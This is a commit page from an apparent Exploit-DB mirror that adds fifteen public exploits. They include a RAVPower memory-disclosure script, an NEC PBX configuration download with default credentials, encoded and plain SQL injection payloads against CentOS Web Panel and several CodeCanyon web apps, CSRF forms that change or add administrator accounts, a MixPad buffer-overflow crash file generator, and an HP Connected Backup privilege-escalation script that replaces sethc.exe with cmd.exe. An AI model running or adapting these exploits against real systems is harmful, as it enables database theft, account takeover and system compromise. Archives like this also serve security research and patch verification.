bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-01-24

Browse source 
15 changes to exploits/shellcodes

MixPad 5.00 - Buffer Overflow
RAVPower 2.000.056 - Memory Disclosure

HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation
CentOS Web Panel 0.9.8.12 - 'row_id' / 'domain' SQL Injection
NEC Univerge SV9100/SV8100 WebPro 10.0 - Configuration Download
LiveCRM SaaS Cloud 1.0 - SQL Injection
Affiligator 2.1.0 - SQL Injection
RSVP Invitation Online 1.0 - Cross-Site Request Forgery (Update Admin)
Easy Car Script 2014 - SQL Injection
Wchat 1.5 - SQL Injection
Zechat 1.5 - SQL Injection
Tumder 2.1 - SQL Injection
Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)
Quickad 4.0 - SQL Injection
Flexible Poll 1.2 - SQL Injection
This commit is contained in:
Offensive Security 2018-01-24 05:01:58 +00:00
parent 4e0e28540e
commit a02c2710c9
16 changed files with 797 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

49
exploits/hardware/dos/43856.py Executable file
View file

@ -0,0 +1,49 @@
"""
# Exploit Title: RAVPower - remote stack disclosure
# Date: 22/01/2018
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: https://www.ravpower.com/
# Software Link: https://www.ravpower.com/
# Version: 2.000.056
# Tested on: OSX
# CVE : CVE-2018-5319
"""
import socket
import sys
import re
__author__ = "Daniele Linguaglossa"
def redall(s):
tmp = s.recv(1)
while not str(tmp).endswith("<errno>"):
tmp+=s.recv(1)
print tmp
tmp = str(tmp).split("\r\n\r\n",1)[1]
return re.sub("[\x0a]+","", tmp,100)
def hexdump(src, length=16):
FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
lines = []
for c in xrange(0, len(src), length):
chars = src[c:c+length]
hex = ' '.join(["%02x" % ord(x) for x in chars])
printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or '.') for x in chars])
lines.append("%04x %-*s %s\n" % (c, length*3, hex, printable))
return ''.join(lines)
if __name__ == "__main__":
if len(sys.argv) == 2:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],80))
packet = "GET /protocol.csp?fname=a&opt=%s&function=get HTTP/1.1\r\nConnection: close\r\nHost: {0}\r\n\r\n".format(sys.argv[1])
packet = packet % ("%0a"*12241)
s.send(packet)
result = redall(s)
print "Dumping memory...\n\n"
print hexdump(result)
else:
print "Usage: {0} <ip>".format(sys.argv[0])

94
exploits/multiple/webapps/43858.txt Normal file
View file

@ -0,0 +1,94 @@
NEC Univerge SV9100/SV8100 WebPro 10.0 Remote Configuration Download
Vendor: NEC Corporation
Product web page: http://www.nec.com
Affected version: WebPro <=10.00
DSP Firmware Version: 12.11.00.02
Summary: NEC's UNIVERGE® SV9100 is the unified communications (UC)
solution of choice for small and medium businesses (SMBs) who don't
want to be left behind. Designed to fit your unique needs, the UNIVERGE
SV9100 platform is a powerful communications solution that provides
SMBs with the efficient, easy-to-deploy, mobile technology that they
require.
Desc: The gzipped telephone system configuration file 'config.gz' or
'config.pcpx' that contains the unencrypted data file 'conf.pcpn',
can be downloaded by an attacker from the root directory if previously
generated by a privileged user. Attacker can also sniff the network
and hijack the session id which resides in a GET request to further
generate the config file. The sessionid can also be brute-forced
because of its predictability containing 5-digit number. This will
enable the attacker to disclose sensitive information and help her
in authentication bypass, privilege escalation, system access and
denial of service via config modification.
Tested on: Henry/1.1
NEC-i SV8100-NA 08.00/2.1
NEC SV9100-GE 07.00.52/2.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5448
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5448.php
11.12.2017
--
Disclosing default credentials with weak password policy:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# curl -O "http://192.168.1.1:8001/config.gz" ; gzip -d config.gz ; hexdump -C -s 0x041f220 -n 352 config
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 66253 100 66253 0 0 17171 0 0:00:03 0:00:03 --:--:-- 17168
0041f220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
0041f300 00 00 00 6e 65 63 69 69 20 20 20 20 20 35 38 34 |...necii 584|
0041f310 34 37 20 20 20 01 00 74 65 63 68 20 20 20 20 20 |47 ..tech |
0041f320 20 31 32 33 34 35 36 37 38 02 00 41 44 4d 49 4e | 12345678..ADMIN|
0041f330 31 20 20 20 20 30 30 30 30 20 20 20 20 03 00 41 |1 0000 ..A|
0041f340 44 4d 49 4e 32 20 20 20 20 39 39 39 39 20 20 20 |DMIN2 9999 |
0041f350 20 04 00 55 53 45 52 31 20 20 20 20 20 31 31 31 | ..USER1 111|
0041f360 31 20 20 20 20 05 00 61 74 65 6c 20 20 20 20 20 |1 ..atel |
0041f370 20 35 38 34 34 37 20 20 20 02 00 20 20 20 20 20 | 58447 .. |
0041f380
Level:User:Password:Role:
- - - - - - - - - - - - -
1:atel:58447:MAN (Manufacturer)
1:necii:47544:MAN (Manufacturer)
1:necii:58447:MAN (Manufacturer)
2:sltech:12345678:IN (Installer)
2:tech:12345678:IN (Installer)
3:ADMIN1:0000:SA (System Administrator A)
3:admin1:0000:SA (System Administrator A)
4:ADMIN2:9999:SB (System Administrator B)
4:admin2:9999:SB (System Administrator B)
4:USER1:1111:UA (User Administrator)
5:USER1:1111441:UA (User Administrator)
5:user1:1111:UA (User Administrator)
SAVE_CONFIG() request (Save to PC) with brute-forceable session
that will generate the config.gz / config.pcpx config file:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
<html>
<body>
<form action="http://192.168.1.1:8001/SaveConfig.htm?sessionId=31337&SAVE_CONFIG()" method="POST" enctype="multipart/form-data">
<input type="hidden" name="hasDataChanged" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

179
exploits/php/webapps/43855.txt Normal file
View file

@ -0,0 +1,179 @@
Document Title:
===============
CentOS Web Panel v0.9.8.12 - Remote SQL Injection Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1833
Release Date:
=============
2018-01-22
Vulnerability Laboratory ID (VL-ID):
====================================
1833
Common Vulnerability Scoring System:
====================================
7.5
Vulnerability Class:
====================
SQL Injection
Current Estimated Price:
========================
4.000€ - 5.000€
Product & Service Introduction:
===============================
CentOS Web Panel - Free Web Hosting control panel is designed for quick and easy management of (Dedicated & VPS) servers without of
need to use ssh console for every little thing. There is lot's of options and features for server management in this control panel.
CWP automatically installs full LAMP on your server (apache,php, phpmyadmin, webmail, mailserver…).
(Copy of the Homepage: http://centos-webpanel.com/features )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the CentOS Web Panel v0.9.8.12.
Vulnerability Disclosure Timeline:
==================================
2018-01-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
CWP
Product: CentOS Web Panel - (CWP) 0.9.8.12
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A remote sql-injection web vulnerability has been discovered in the official CentOS Web Panel v0.9.8.12 web-application.
The vulnerability allows remote attackers to inject own malicious sql commands to compromise the connected web-server or dbms.
The sql-injection vulnerability is located in the `row_id` and `domain` value of the `Add a domain` module POST method request.
Remote attackers are able to manipulate the POST method request to execute own malicious sql commands on the application-side
of the web-application. The request method to inject is POST and the attack vector is application-side. The vulnerability can
be exploited by restricted user accounts against the web-application administrator.
The security risk of the sql-injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.5.
Exploitation of the remote sql injection vulnerability requires no user interaction and only a low privileged web-application user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Add a domain
Vulnerable Parameter(s):
[+] row_id
[+] domain
Affected Module(s):
[+] Delete domain
Proof of Concept (PoC):
=======================
The remote sql-injecton vulnerability can be exploited by remote attackers with low privilege user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Add a domain
2. Delete the same domain
3. Intercept the http request with a session tamper
4. Manipulate in the POST method request the values `row_id` or `domain` with '
5. Continue the request and an exploitable sql-exception becomes visible
6. Now the attacker can inject to the row_id and domain to execute malicious sql commands via restricted user account
7. Successful reproduce of the sql-injection vulnerability!
--- SQL Error Exceptions ---
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'test-domain'' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in
/usr/local/cwpsrv/htdocs/resources/admin/include/functions.php(1) : eval()'d code(1) : eval()'d code on line 5
--- PoC Session logs [POST] ---
Status: 200[OK]
POST http://cwp.localhost:2030/index.php?module=list_domains
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[185.4.149.65:2030]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://cwp.localhost:2030/index.php?module=list_domains]
Cookie[cwpsrv-b66ec0f9742b8f4bd3407e0151cd756c=ae0c56ru1ver0k3d0cd1hh4147]
Connection[keep-alive]
POST-Daten:
ifpost[yes]
username[test-dom]
domain[SQL-INJECTION PAYLOAD!]
row_id[SQL-INJECTION PAYLOAD!]
Response Header:
Date[Mon, 25 Apr 2016 12:32:33 GMT]
Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27]
X-Powered-By[PHP/5.4.27]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]
Reference(s):
http://cwp.localhost:2030/
http://cwp.localhost:2030/index.php
http://cwp.localhost:2030/index.php?module=list_domains
Security Risk:
==============
The security risk of the remote sql-injection web vulnerability in the centos web panel application is estimated as high. (CVSS 7.5)
Credits & Authors:
==================
Vulnerability-Lab [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

26
exploits/php/webapps/43860.txt Normal file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: LiveCRM SaaS Cloud 1.0 - SQL Injection
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://livecrm.co/
# Software Link: https://codecanyon.net/item/livecrm-saas-cloud-cloud-based-open-source-complete-business-management-solution-crm/21219419
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5985
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/livecrm/web/index.php?r=site/login&company_id=[SQL]
#
# %31%20%4f%52%20%31%20%47%52%4f%55%50%20%42%59%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%33%61%2c%56%45%52%53%49%4f%4e%28%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%20%48%41%56%49%4e%47%20%4d%49%4e%28%30%29%20%4f%52%20%31
#
# # # # #

26
exploits/php/webapps/43861.txt Normal file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Affiligator - Affiliate Webshop Management System 2.1.0 - SQL Injection
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: https://www.getaffiligator.com/
# Software Link: https://codecanyon.net/item/affiligator-affiliate-webshop-management-system/21214946
# Version: 2.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5977
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/search/?q=&price_type=range&price=[SQL]
#
# %31%30%30%20%61%6e%64%28%73%65%6c%65%63%74%21%56%65%72%41%79%61%72%69%2d%7e%30%2e%20%66%72%6f%6d%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%56%65%72%73%69%6f%6e%28%29%29%29%79%29%78%29
#
# # # # #

32
exploits/php/webapps/43862.html Normal file
View file

@ -0,0 +1,32 @@
<!--
# # # # #
# Exploit Title: RSVP Invitation Online 1.0 - Cross-Site Request Forgery (Update Admin Pass)
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://putrazendrato.link/
# Software Link: https://www.codegrape.com/item/rsvp-invitation-online/3890
# Demo: http://putrazendrato.link/rsvp/login.php
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5976
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
#
# Proof of Concept:
# 1)
-->
<html>
<body>
<form method="post" action="http://localhost/rsvp/function/account.php">
<!--Change admin pass-->
<input name="newpassword" type="text" value="efe">
<!--Change admin pass confirm-->
<input name="confirm" type="text" value="efe">
<input type="submit" name="Submit" value="Update">
</form>
</body>
</html>

26
exploits/php/webapps/43863.txt Normal file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Easy Car Script 2014 - SQL Injection
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://www.easyphotostore.com/
# Software Link: http://www.easycarscript.com/
# Version: 2014
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5986
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/site_search.php?s_vehicletype=auto&s_order=[SQL]&s_row=[SQL]
#
# %35%31%20%2f%2a%21%30%35%35%35%35%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%35%35%35%35%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%30%35%35%35%35%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%2c%64%61%74%61%62%61%73%65%28%29%29%29%2c%30%29%2d%2d%20%2d
#
# # # # #

27
exploits/php/webapps/43864.txt Normal file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script 1.5 - SQL Injection
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://bylancer.com/
# Software Link: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319
# Version: 1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5979
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/login.php
#
# User: ' UNION ALL SELECT 0x31,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x33,0x34-- XXX
# Pass: anything
#
# # # # #

27
exploits/php/webapps/43865.txt Normal file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Facebook Style Php Ajax Chat - Zechat 1.5 - SQL Injection
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://bylancer.com/
# Software Link: https://codecanyon.net/item/facebook-style-php-ajax-chat-zechat/16491266
# Version: 1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5978
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/login.php
#
# User: ' UNION ALL SELECT 0x31,0x32,0x33,concat(0x63)-- A
# Pass: anything
#
# # # # #

26
exploits/php/webapps/43866.txt Normal file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Tumder - An Arcade Games Platform 2.1 - SQL Injection
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://sndr.co.ve/
# Software Link: https://codecanyon.net/item/tumder-an-arcade-games-platform/18726994
# Version: 2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5984
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/category/[SQL]
#
# %2d%33%20%20%2f%2a%21%30%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%31%31%31%31%41%4c%4c%2a%2f%20%2f%2a%21%30%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%30%78%33%31%2c%30%78%33%32%2c%43%4f%4e%43%41%54%28%44%61%74%61%62%61%73%65%28%29%2c%56%45%52%53%49%4f%4e%28%29%2c%30%78%37%65%2c%44%41%54%41%42%41%53%45%28%29%2c%30%78%37%65%2c%55%53%45%52%28%29%29%2d%2d%20%2d
#
# # # # #

58
exploits/php/webapps/43867.html Normal file
View file

@ -0,0 +1,58 @@
<!--
# # # # #
# Exploit Title: Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://ronnieswietek.com/
# Software Link: https://codecanyon.net/item/client-photo-studio-photography-cms/1191688
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5969
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
#
# Proof of Concept:
# 1)
-->
<html>
<body>
<script src="http://code.jquery.com/jquery-1.7.1.min.js"></script>
<h2>New Admin</h2>
<div class="efe">
<form method="post" onSubmit="return false">
<label for="username">Username:</label>
<input id="username" type="text"><br><br>
<label for="password1">Password:</label>
<input id="password1" type="password"><br><br>
<label for="password2">Confirm Password:</label>
<input id="password2" type="password"><br><br>
<label for="email">Email:</label>
<input id="email" type="text"><br><br>
<input id="ekleabi" value="Ver Ayari" type="submit">
</form>
</div>
<script type="text/javascript">
$("#ekleabi").live('click',function()
{
$.ajax({
type: "POST",
url: "http://ronnieswietek.com/cc/clients/resources/ajax/ajax_new_admin.php",
data:{
username:$(".efe #username").val(),
password1:$(".efe #password1").val(),
password2:$(".efe #password2").val(),
email:$(".efe #email").val()
}
});
});
</script>
</body>
</html>

66
exploits/php/webapps/43868.txt Normal file
View file

@ -0,0 +1,66 @@
# # # # #
# Exploit Title: Classified Ads CMS - Quickad 4.0 - SQL Injection
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://bylancer.com/
# Software Link: https://codecanyon.net/item/quickad-classified-ads-php-script/19960675
# Version: 4.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5972
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/listing?keywords=[SQL]&location=All%20United%20States&placetype=country&placeid=231[SQL]&cat=[SQL]&subcat=5[SQL]&filter=&sort=Newest&Submit=
#
# ' UNION ALL SELECT NULL,CONCAT(version(),0x7e7e,database()),NULL-- gLLf
#
# Parameter: keywords (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: keywords=a%' AND 1665=1665 AND '%'='&location=All United States&placetype=country&placeid=231&cat=&subcat=5&filter=&sort=Newest&Submit=
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: keywords=a%' AND (SELECT 7944 FROM(SELECT COUNT(*),CONCAT(0x71706a7871,(SELECT (ELT(7944=7944,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='&location=All United States&placetype=country&placeid=231&cat=&subcat=5&filter=&sort=Newest&Submit=
#
# Parameter: placeid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: keywords=a&location=All United States&placetype=country&placeid=231') AND 1976=1976 AND ('lFmx'='lFmx&cat=&subcat=5&filter=&sort=Newest&Submit=
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: keywords=a&location=All United States&placetype=country&placeid=231') AND (SELECT 3263 FROM(SELECT COUNT(*),CONCAT(0x71706a7871,(SELECT (ELT(3263=3263,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('psTy'='psTy&cat=&subcat=5&filter=&sort=Newest&Submit=
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 31 columns
# Payload: keywords=a&location=All United States&placetype=country&placeid=231') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7871,0x465344587867724149544c5a556147787a5876737447595477725372556d4a576c786c50546d7667,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- IJTp&cat=&subcat=5&filter=&sort=Newest&Submit=
#
# Parameter: subcat (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: keywords=a&location=All United States&placetype=country&placeid=231&cat=&subcat=5') AND 7923=7923 AND ('zhKR'='zhKR&filter=&sort=Newest&Submit=
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: keywords=a&location=All United States&placetype=country&placeid=231&cat=&subcat=5') AND (SELECT 5797 FROM(SELECT COUNT(*),CONCAT(0x71706a7871,(SELECT (ELT(5797=5797,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('SvkR'='SvkR&filter=&sort=Newest&Submit=
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 31 columns
# Payload: keywords=a&location=All United States&placetype=country&placeid=231&cat=&subcat=5') UNION ALL SELECT CONCAT(0x71706a7871,0x6d72485769576563544a7a73516f67797544477a67515556755054545146717253556e676e705a74,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jcSO&filter=&sort=Newest&Submit=
#
# Parameter: cat (GET)
# Type: UNION query
# Title: Generic UNION query (NULL) - 3 columns
# Payload: keywords=a&location=All United States&placetype=country&placeid=231&cat=' UNION ALL SELECT NULL,CONCAT(0x71706a7871,0x786a716b7066557459416e78454b506469534c61464f6d78664e434a49506c494b7a795243554556,0x716a6b6271),NULL-- gLLf&subcat=5&filter=&sort=Newest&Submit=
#
# # # # #

29
exploits/php/webapps/43869.txt Normal file
View file

@ -0,0 +1,29 @@
# # # # #
# Exploit Title: Flexible Poll 1.2 - SQL Injection
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://ddywpro.com/
# Software Link: https://codecanyon.net/item/flexible-poll/4363114
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5988
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?id=[SQL]
#
# 2)
# http://localhost/[PATH]/mobile_preview.php?id=[SQL]
#
# -714'+UniOn+SElecT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),2,3,4,5--+-
#
# # # # #

39
exploits/windows/dos/43854.py Executable file
View file

@ -0,0 +1,39 @@
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: NCH Software MixPad v5.00 - Unicode Buffer Overflow
# Date: 21-01-2017
# Vulnerable Software: NCH Software MixPad
# Vendor Homepage: http://www.nch.com.au/mixpad
# Version: v5.00
# Software Link: http://www.nch.com.au/mixpad/mpsetup.exe
# Tested On: Windows XP
#
#
# PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound'
#
# no unicode jmp/call to esp
#
# EAX 00117700
# ECX 001167F0
# EDX 7C90E514 ntdll.KiFastSystemCallRet
# EBX 00000000
# ESP 00116C40 UNICODE "BBBBBB does not exist or cannot be accessed."
# EBP 00116FAC
# ESI 0000004E
# EDI 00117740
# EIP 00CC00CC
filename="crash.txt"
junk = "A"*251
eip = "\xcc"*2 #eip over; jmp/call esp goes here
fill = "B"*100 #only 6 used in esp
buffer = junk + eip + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

78
exploits/windows/local/43857.py Executable file
View file

@ -0,0 +1,78 @@
#Tested on HP Connected Backup version 8.8.2.0 on Windows 7 x64
import os
import sys
import time
import requests
from bs4 import BeautifulSoup
def send_request(body):
url="http://localhost:16386/"
headers = {"Content-Type": "text/xml; charset=utf-8", 'SOAPAction': '""', "Set-Cookie": "CCSessionID=SessionID11"}
response = requests.post(url, data=body, headers=headers)
if response.status_code != requests.codes.ok:
print "Non-200 response. Exiting..."
sys.exit()
else:
return response.text
def get_tdate(response):
soup = BeautifulSoup(response, "html.parser")
tdate = soup.findAll("m-tdate")[0].string
return tdate
#Copy cmd.exe to world-writeable folder
print "HP Connected Backup Privilege Escalation by Peter Lapp(lappsec)"
print "Copying cmd.exe to C:\\hpcb-privesc"
os.system("mkdir C:\\hpcb-privesc")
os.system("copy C:\\Windows\\system32\\cmd.exe C:\\hpcb-privesc\\sethc.exe")
print "Creating backup for C:\\hpcb-privesc\\sethc.exe"
#StartScan required before IncludeFile request will be accepted
send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:StartScan xmlns:q1="http://localhost/UIRequestHandler.wsdl" /></soap:Body></soap:Envelope>""")
time.sleep(3)
#Add file to backup
send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:IncludeFile xmlns:q1="http://localhost/UIRequestHandler.wsdl"><param-1 xsi:type="xsd:base64Binary">QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==</param-1><param-2 xsi:type="xsd:boolean">true</param-2></q1:IncludeFile></soap:Body></soap:Envelope>""")
print "Initiating Backup"
#Start backup
send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:Backup xmlns:q1="http://localhost/UIRequestHandler.wsdl" /></soap:Body></soap:Envelope>""")
